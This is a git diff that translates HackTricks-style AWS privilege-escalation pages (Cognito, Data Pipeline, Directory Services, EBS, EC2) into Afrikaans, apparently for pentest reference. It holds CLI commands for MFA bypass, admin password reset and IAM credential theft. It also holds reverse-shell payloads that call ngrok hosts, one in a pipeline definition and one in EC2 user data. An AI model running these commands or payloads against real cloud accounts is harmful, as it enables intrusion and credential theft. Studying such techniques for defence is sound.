+**AdminSetUserSettings**: 'n Aanvaller kan moontlik hierdie toestemming misbruik om 'n mobiele telefoon onder sy beheer as **SMS MFA van 'n gebruiker** in te stel.
 ```bash
 aws cognito-idp admin-set-user-settings \
-    --user-pool-id <value> \
-    --username <value> \
-    --mfa-options <value>
+--user-pool-id <value> \
+--username <value> \
+--mfa-options <value>
 ```
-
-**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection.
-
+**SetUserMFAPreference:** Soortgelyk aan die vorige een, kan hierdie toestemming gebruik word om MFA-voorkeure van 'n gebruiker in te stel om die MFA-beskerming te omseil.
 ```bash
 aws cognito-idp admin-set-user-mfa-preference \
-    [--sms-mfa-settings <value>] \
-    [--software-token-mfa-settings <value>] \
-    --username <value> \
-    --user-pool-id <value>
+[--sms-mfa-settings <value>] \
+[--software-token-mfa-settings <value>] \
+--username <value> \
+--user-pool-id <value>
 ```
-
-**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection.
-
+**SetUserPoolMfaConfig**: Soortgelyk aan die vorige een kan hierdie toestemming gebruik word om MFA-voorkeure van 'n gebruikerspoel in te stel om die MFA-beskerming te omseil.
 ```bash
 aws cognito-idp set-user-pool-mfa-config \
-    --user-pool-id <value> \
-    [--sms-mfa-configuration <value>] \
-    [--software-token-mfa-configuration <value>] \
-    [--mfa-configuration <value>]
+--user-pool-id <value> \
+[--sms-mfa-configuration <value>] \
+[--software-token-mfa-configuration <value>] \
+[--mfa-configuration <value>]
 ```
+**UpdateUserPool:** Dit is ook moontlik om die gebruikerspoel op te dateer om die MFA-beleid te verander. [Kyk cli hier](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html).
 
-**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html).
-
-**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection.
+**Potential Impact:** Indirekte privesc na potensieel enige gebruiker waarvan die aanvaller die akrediteeringe ken, dit kan toelaat om die MFA-beskerming te omseil.
 
 ### `cognito-idp:AdminUpdateUserAttributes`
 
-An attacker with this permission could change the email or phone number or any other attribute of a user under his control to try to obtain more privileges in an underlaying application.\
-This allows to change an email or phone number and set it as verified.
-
+'n Aanvaller met hierdie toestemming kan die e-pos of telefoonnommer of enige ander attribuut van 'n gebruiker onder sy beheer verander om te probeer om meer voorregte in 'n onderliggende toepassing te verkry.\
+Dit maak dit moontlik om 'n e-pos of telefoonnommer te verander en dit as geverifieer in te stel.
 ```bash
 aws cognito-idp admin-update-user-attributes \
-    --user-pool-id <value> \
-    --username <value> \
-    --user-attributes <value>
+--user-pool-id <value> \
+--username <value> \
+--user-attributes <value>
 ```
-
-**Potential Impact:** Potential indirect privesc in the underlying application using Cognito User Pool that gives privileges based on user attributes.
+**Potensiële Impak:** Potensiële indirekte privesc in die onderliggende toepassing wat Cognito User Pool gebruik wat voorregte gee gebaseer op gebruikersattributen.
 
 ### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient`
 
-An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period...
+'n Aanvaller met hierdie toestemming kan **'n nuwe User Pool Client minder beperk** as reeds bestaande pool kliënte skep. Byvoorbeeld, die nuwe kliënt kan enige soort metode toelaat om te autentiseer, geen geheim hê nie, token herroeping gedeaktiveer hê, tokens toelaat om vir 'n langer tydperk geldig te wees...
 
-The same can be be don if instead of creating a new client, an **existing one is modified**.
-
-In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!.
+Diezelfde kan gedoen word as daar in plaas van om 'n nuwe kliënt te skep, 'n **bestaande een gewysig** word.
 
+In die [**opdraglyn**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (of die [**opdateer een**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) kan jy al die opsies sien, kyk daarna!
 ```bash
 aws cognito-idp create-user-pool-client \
-    --user-pool-id <value> \
-    --client-name <value> \
-    [...]
+--user-pool-id <value> \
+--client-name <value> \
+[...]
 ```
-
-**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create.
+**Potensiële Impak:** Potensiële indirekte privesc na die Identiteitspoel gemagtigde gebruiker wat deur die Gebruikerspoel gebruik word deur 'n nuwe kliënt te skep wat die sekuriteitsmaatreëls verslap en dit moontlik maak vir 'n aanvaller om in te log met 'n gebruiker wat hy kon skep.
 
 ### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob`
 
-An attacker could abuse this permission to create users y uploading a csv with new users.
-
+'n Aanvaller kan hierdie toestemming misbruik om gebruikers te skep deur 'n csv met nuwe gebruikers op te laai.
 ```bash
 # Create a new import job
 aws cognito-idp create-user-import-job \
-    --job-name <value> \
-    --user-pool-id <value> \
-    --cloud-watch-logs-role-arn <value>
+--job-name <value> \
+--user-pool-id <value> \
+--cloud-watch-logs-role-arn <value>
 
 # Use a new import job
 aws cognito-idp start-user-import-job \
-    --user-pool-id <value> \
-    --job-id <value>
+--user-pool-id <value> \
+--job-id <value>
 
 # Both options before will give you a URL where you can send the CVS file with the users to create
 curl -v -T "PATH_TO_CSV_FILE" \
-    -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
+-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"
 ```
+(In die geval waar jy 'n nuwe invoer werk skep, mag jy ook die iam passrole toestemming nodig hê, ek het dit nog nie getoets nie).
 
-(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet).
-
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+**Potensiële Impak:** Direkte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers. Indirekte privesc na ander app funksies wat in staat is om enige gebruiker te skep.
 
 ### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider`
 
-An attacker could create a new identity provider to then be able to **login through this provider**.
-
+'n Aanvaller kan 'n nuwe identiteitsverskaffer skep om dan in staat te wees om **deur hierdie verskaffer aan te meld**.
 ```bash
 aws cognito-idp create-identity-provider \
-    --user-pool-id <value> \
-    --provider-name <value> \
-    --provider-type <value> \
-    --provider-details <value> \
-    [--attribute-mapping <value>] \
-    [--idp-identifiers <value>]
+--user-pool-id <value> \
+--provider-name <value> \
+--provider-type <value> \
+--provider-details <value> \
+[--attribute-mapping <value>] \
+[--idp-identifiers <value>]
 ```
+**Potensiële Impak:** Direkte privesc na die identiteitspoel IAM-rol vir geverifieerde gebruikers. Indirekte privesc na ander app-funksies wat in staat is om enige gebruiker te skep.
 
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user.
+### cognito-sync:\* Analise
 
-### cognito-sync:\* Analysis
+Dit is 'n baie algemene toestemming standaard in rolle van Cognito Identiteitspoele. Alhoewel 'n wildcard in 'n toestemmings altyd sleg lyk (veral afkomstig van AWS), is die **gegewe toestemmings nie super nuttig vanuit 'n aanvaller se perspektief nie**.
 
-This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**.
+Hierdie toestemming laat toe om gebruikersinligting van Identiteitspoele en Identiteits-ID's binne Identiteitspoele te lees (wat nie sensitiewe inligting is nie).\
+Identiteits-ID's mag [**Datasette**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) toegeken hê, wat inligting van die sessies is (AWS definieer dit as 'n **gespeelde speletjie**). Dit mag moontlik wees dat dit 'n soort sensitiewe inligting bevat (maar die waarskynlikheid is redelik laag). Jy kan in die [**enumerasiepunt**](../aws-services/aws-cognito-enum/) vind hoe om toegang tot hierdie inligting te verkry.
 
-This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\
-Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../aws-services/aws-cognito-enum/) how to access this information.
+'n Aanvaller kan ook hierdie toestemmings gebruik om **homself in te skryf op 'n Cognito-stroom wat veranderinge publiseer** op hierdie datasette of 'n **lambda wat geaktiveer word op cognito-gebeurtenisse**. Ek het nie gesien dat dit gebruik word nie, en ek sou nie sensitiewe inligting hier verwag nie, maar dit is nie onmoontlik nie.
 
-An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible.
+### Outomatiese Gereedskap
 
-### Automatic Tools
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), die AWS-uitbuitingsraamwerk, sluit nou die "cognito\_\_enum" en "cognito\_\_attack" modules in wat die enumerasie van alle Cognito-bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattributen wat vir toegangbeheer gebruik word, ens., merk, en ook die skepping van gebruikers outomatiseer (insluitend MFA-ondersteuning) en privilige-eskalasie gebaseer op aanpasbare pasgemaakte attributen, bruikbare identiteitspoel akkrediteer, aanneembare rolle in id tokens, ens.
 
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blogpos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie-instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy.
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
-
-#### Usage
-
-Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+#### Gebruik
 
+Voorbeeld van cognito\_\_attack gebruik om te probeer om 'n gebruiker te skep en alle privesc vektore teen 'n gegewe identiteitspoel en gebruikerspoel kliënt:
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
-
+Voorbeeld cognito\_\_enum gebruik om al die gebruikerspoele, gebruikerspoel kliënte, identiteitspoele, gebruikers, ens. wat sigbaar is in die huidige AWS-rekening, te versamel:
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is 'n CLI-gereedskap in python wat verskillende aanvalle op Cognito implementeer, insluitend 'n privesc-escalasie.
 
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation.
-
-#### Installation
-
+#### Installasie
 ```bash
 $ pip install cognito-scanner
 ```
-
-#### Usage
-
+#### Gebruik
 ```bash
 $ cognito-scanner --help
 ```
-
-For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner)
+Vir meer inligting, kyk na [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
index 82c82682e..5c780098e 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
@@ -4,7 +4,7 @@
 
 ## datapipeline
 
-For more info about datapipeline check:
+Vir meer inligting oor datapipeline, kyk:
 
 {{#ref}}
 ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -12,67 +12,57 @@ For more info about datapipeline check:
 
 ### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`
 
-Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:**
-
+Gebruikers met hierdie **toestemmings kan voorregte verhoog deur 'n Data Pipeline te skep** om arbitrêre opdragte uit te voer met behulp van die **toestemmings van die toegewyde rol:**
 ```bash
 aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
 ```
-
-After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations:
-
+Na die skep van die pyplyn, werk die aanvaller sy definisie by om spesifieke aksies of hulpbron skeppings te bepaal:
 ```json
 {
-  "objects": [
-    {
-      "id": "CreateDirectory",
-      "type": "ShellCommandActivity",
-      "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
-      "runsOn": { "ref": "instance" }
-    },
-    {
-      "id": "Default",
-      "scheduleType": "ondemand",
-      "failureAndRerunMode": "CASCADE",
-      "name": "Default",
-      "role": "assumable_datapipeline",
-      "resourceRole": "assumable_datapipeline"
-    },
-    {
-      "id": "instance",
-      "name": "instance",
-      "type": "Ec2Resource",
-      "actionOnTaskFailure": "terminate",
-      "actionOnResourceFailure": "retryAll",
-      "maximumRetries": "1",
-      "instanceType": "t2.micro",
-      "securityGroups": ["default"],
-      "role": "assumable_datapipeline",
-      "resourceRole": "assumable_ec2_profile_instance"
-    }
-  ]
+"objects": [
+{
+"id": "CreateDirectory",
+"type": "ShellCommandActivity",
+"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
+"runsOn": { "ref": "instance" }
+},
+{
+"id": "Default",
+"scheduleType": "ondemand",
+"failureAndRerunMode": "CASCADE",
+"name": "Default",
+"role": "assumable_datapipeline",
+"resourceRole": "assumable_datapipeline"
+},
+{
+"id": "instance",
+"name": "instance",
+"type": "Ec2Resource",
+"actionOnTaskFailure": "terminate",
+"actionOnResourceFailure": "retryAll",
+"maximumRetries": "1",
+"instanceType": "t2.micro",
+"securityGroups": ["default"],
+"role": "assumable_datapipeline",
+"resourceRole": "assumable_ec2_profile_instance"
+}
+]
 }
 ```
-
 > [!NOTE]
-> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**.
+> Let daarop dat die **rol** in **lyn 14, 15 en 27** 'n rol moet wees wat **assumable is deur datapipeline.amazonaws.com** en die rol in **lyn 28** moet 'n **rol wees wat assumable is deur ec2.amazonaws.com met 'n EC2-profiel instansie**.
 >
-> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).
-
+> Boonop sal die EC2-instansie slegs toegang hê tot die rol wat assumable is deur die EC2-instansie (so jy kan net daardie een steel).
 ```bash
 aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
-    --pipeline-definition file:///pipeline/definition.json
+--pipeline-definition file:///pipeline/definition.json
 ```
+Die **pypelyn-definisie-lêer, saamgestel deur die aanvaller, sluit opdragte in om opdragte uit te voer** of hulpbronne te skep via die AWS API, wat die Data Pipeline se roltoestemmings benut om moontlik bykomende voorregte te verkry.
 
-The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.
+**Potensiële Impak:** Direkte privesc na die ec2 diensrol wat gespesifiseer is.
 
-**Potential Impact:** Direct privesc to the ec2 service role specified.
-
-## References
+## Verwysings
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
index ce24095ed..794cda193 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
@@ -4,7 +4,7 @@
 
 ## Directory Services
 
-For more info about directory services check:
+Vir meer inligting oor directory services, kyk:
 
 {{#ref}}
 ../aws-services/aws-directory-services-workdocs-enum.md
@@ -12,27 +12,21 @@ For more info about directory services check:
 
 ### `ds:ResetUserPassword`
 
-This permission allows to **change** the **password** of any **existent** user in the Active Directory.\
-By default, the only existent user is **Admin**.
-
+Hierdie toestemming laat toe om die **wagwoord** van enige **bestaande** gebruiker in die Active Directory te **verander**.\
+Standaard is die enigste bestaande gebruiker **Admin**.
 ```
 aws ds reset-user-password --directory-id <id> --user-name Admin --new-password Newpassword123.
 ```
-
 ### AWS Management Console
 
-It's possible to enable an **application access URL** that users from AD can access to login:
+Dit is moontlik om 'n **toepassingstoegang URL** in te skakel wat gebruikers van AD kan gebruik om aan te meld:
 
 <figure><img src="../../../images/image (244).png" alt=""><figcaption></figcaption></figure>
 
-And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console:
+En dan **hulle 'n AWS IAM rol te gee** vir wanneer hulle aanmeld, op hierdie manier sal 'n AD gebruiker/groep toegang hê tot die AWS bestuurskonsol:
 
 <figure><img src="../../../images/image (155).png" alt=""><figcaption></figcaption></figure>
 
-There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission
+Daar is blykbaar geen manier om die toepassingstoegang URL, die AWS Bestuurskonsol en toestemming te aktiveer nie.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
index b4af46712..112d93acb 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
@@ -4,7 +4,7 @@
 
 ## dynamodb
 
-For more info about dynamodb check:
+Vir meer inligting oor dynamodb, kyk:
 
 {{#ref}}
 ../aws-services/aws-dynamodb-enum.md
@@ -12,16 +12,12 @@ For more info about dynamodb check:
 
 ### Post Exploitation
 
-As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**:
+Soos ek weet, is daar **geen direkte manier om voorregte in AWS te verhoog net deur 'n paar AWS `dynamodb` toestemmings te hê**. Jy kan **sensitiewe** inligting uit die tabelle lees (wat AWS geloofsbriewe kan bevat) en **inligting op die tabelle skryf** (wat ander kwesbaarhede kan aktiveer, soos lambda kode-inspuitings...) maar al hierdie opsies word reeds oorweeg in die **DynamoDB Post Exploitation bladsy**:
 
 {{#ref}}
 ../aws-post-exploitation/aws-dynamodb-post-exploitation.md
 {{#endref}}
 
-### TODO: Read data abusing data Streams
+### TODO: Lees data deur data Streams te misbruik
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
index 36ea3bc53..e2521ee5e 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md
@@ -6,26 +6,22 @@
 
 ### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots`
 
-An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in:
+'n Aanvaller met hierdie sal potensieel in staat wees om **volumesnapshots plaaslik af te laai en te analiseer** en sensitiewe inligting daarin te soek (soos geheime of bronkode). Vind uit hoe om dit te doen in:
 
 {{#ref}}
 ../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
 {{#endref}}
 
-Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
+Ander toestemmings kan ook nuttig wees soos: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
 
-The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**.
+Die hulpmiddel [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) voer hierdie aanval uit om **wachtwoorde van 'n domeinbeheerder te onttrek**.
 
-**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords).
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die snapshot te lokaliseer (jy kan selfs Active Directory-wachtwoorde kry).
 
 ### **`ec2:CreateSnapshot`**
 
-Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+Enige AWS-gebruiker wat die **`EC2:CreateSnapshot`** toestemming besit, kan die hashes van alle domein gebruikers steel deur 'n **snapshot van die Domeinbeheerder** te skep, dit aan 'n instansie wat hulle beheer te koppel en die **NTDS.dit en SYSTEM** registerhive-lêer te eksporteer vir gebruik met Impacket se secretsdump-projek.
 
-You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+Jy kan hierdie hulpmiddel gebruik om die aanval te outomatiseer: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) of jy kan een van die vorige tegnieke gebruik nadat jy 'n snapshot geskep het.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
index ad31bde00..9b1911c18 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
@@ -4,7 +4,7 @@
 
 ## EC2
 
-For more **info about EC2** check:
+Vir meer **inligting oor EC2** kyk:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,51 +12,46 @@ For more **info about EC2** check:
 
 ### `iam:PassRole`, `ec2:RunInstances`
 
-An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint.
+'n Aanvaller kan **'n instansie skep wat 'n IAM rol aanheg en dan toegang tot die instansie verkry** om die IAM rol geloofsbriewe van die metadata eindpunt te steel.
 
-- **Access via SSH**
-
-Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`).
+- **Toegang via SSH**
 
+Voer 'n nuwe instansie uit met 'n **geskepte** **ssh sleutel** (`--key-name`) en ssh dan daarin (as jy 'n nuwe een wil skep, mag jy die toestemming `ec2:CreateKeyPair` nodig hê).
 ```bash
 aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
-    --iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
-    --security-group-ids <sg-id>
+--iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
+--security-group-ids <sg-id>
 ```
+- **Toegang via rev shell in gebruikersdata**
 
-- **Access via rev shell in user data**
-
-You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way.
-
+Jy kan 'n nuwe instansie gebruik deur 'n **gebruikersdata** (`--user-data`) wat vir jou 'n **rev shell** sal stuur. Jy hoef nie 'n sekuriteitsgroep op hierdie manier te spesifiseer nie.
 ```bash
 echo '#!/bin/bash
 curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
 
 aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
-   --iam-instance-profile Name=E<instance-profile-name> \
-   --count 1 \
-   --user-data "file:///tmp/rev.sh"
+--iam-instance-profile Name=E<instance-profile-name> \
+--count 1 \
+--user-data "file:///tmp/rev.sh"
 ```
-
-Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance:
+Wees versigtig met GuradDuty as jy die akrediteerings van die IAM-rol buite die instansie gebruik:
 
 {{#ref}}
 ../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
 {{#endref}}
 
-**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles.
+**Potensiële Impak:** Direkte privesc na enige EC2-rol wat aan bestaande instansieprofiele geheg is.
 
-#### Privesc to ECS
-
-With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**.
+#### Privesc na ECS
 
+Met hierdie stel toestemmings kan jy ook **'n EC2-instansie skep en dit binne 'n ECS-kluster registreer**. Op hierdie manier sal ECS **dienste** **uitgevoer** word in die **EC2-instansie** waartoe jy toegang het en dan kan jy daardie dienste (docker houers) penetreer en **hulle ECS-rolle wat geheg is** steel.
 ```bash
 aws ec2 run-instances \
-    --image-id ami-07fde2ae86109a2af \
-    --instance-type t2.micro \
-    --iam-instance-profile <ECS_role> \
-    --count 1 --key-name pwned \
-    --user-data "file:///tmp/asd.sh"
+--image-id ami-07fde2ae86109a2af \
+--instance-type t2.micro \
+--iam-instance-profile <ECS_role> \
+--count 1 --key-name pwned \
+--user-data "file:///tmp/asd.sh"
 
 # Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
 # The EC2 instance profile needs basic ECS access
@@ -64,22 +59,20 @@ aws ec2 run-instances \
 #!/bin/bash
 echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;
 ```
-
-To learn how to **force ECS services to be run** in this new EC2 instance check:
+Om te leer hoe om **ECS-dienste te dwing om** in hierdie nuwe EC2-instantie te loop, kyk:
 
 {{#ref}}
 aws-ecs-privesc.md
 {{#endref}}
 
-If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack.
+As jy **nie 'n nuwe instansie kan skep nie** maar die toestemming `ecs:RegisterContainerInstance` het, kan jy dalk die instansie binne die kluster registreer en die kommentaar-aanval uitvoer.
 
-**Potential Impact:** Direct privesc to ECS roles attached to tasks.
+**Potensiële Impak:** Direkte privesc na ECS-rolle wat aan take geheg is.
 
 ### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**
 
-Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\
-As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**.
-
+Soos in die vorige scenario, kan 'n aanvaller met hierdie toestemmings die **IAM-rol van 'n gecompromitteerde instansie verander** sodat hy nuwe akrediteerbare kan steel.\
+Aangesien 'n instansieprofiel slegs 1 rol kan hê, as die instansieprofiel **reeds 'n rol het** (gewone geval), sal jy ook **`iam:RemoveRoleFromInstanceProfile`** benodig.
 ```bash
 # Removing role from instance profile
 aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>
@@ -87,60 +80,50 @@ aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-
 # Add role to instance profile
 aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>
 ```
+As die **instansprofiel 'n rol het** en die aanvaller **dit nie kan verwyder nie**, is daar 'n ander omweg. Hy kan **vind** 'n **instansprofiel sonder 'n rol** of **nuwe een skep** (`iam:CreateInstanceProfile`), **voeg** die **rol** by daardie **instansprofiel** (soos voorheen bespreek), en **koppel die instansprofiel** wat gecompromitteer is aan 'n gecompromitteerde i**nstans:**
 
-If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:**
-
-- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \*
-
+- As die instans **nie enige instans** profiele het nie (`ec2:AssociateIamInstanceProfile`) \*
 ```bash
 aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
 ```
-
